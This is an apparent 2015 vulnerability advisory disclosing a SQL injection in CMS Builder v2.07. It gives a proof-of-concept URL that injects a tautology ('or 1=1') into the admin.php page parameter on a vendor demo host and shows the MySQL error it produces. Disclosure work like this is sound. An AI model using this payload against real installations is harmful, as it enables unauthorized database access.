CMS Builder 2.07 SQL Injection

2015.03.28

Credit: Provensec

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Affected software: CMS Builder v2.07
# Type of vulnerability: sql injection
# URL: http://demo2.interactivetools.com/cmsbuilder2/bottom.php
# Discovered by: Provensec
# Website: http://www.provensec.com
#versionv2.07
# Proof of concept
http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=payload
demo:->
http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=x%27%20or%201=1%20or%20%27x%27=%27y
MySQL Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'-25' at line 9

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CMS Builder 2.07 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.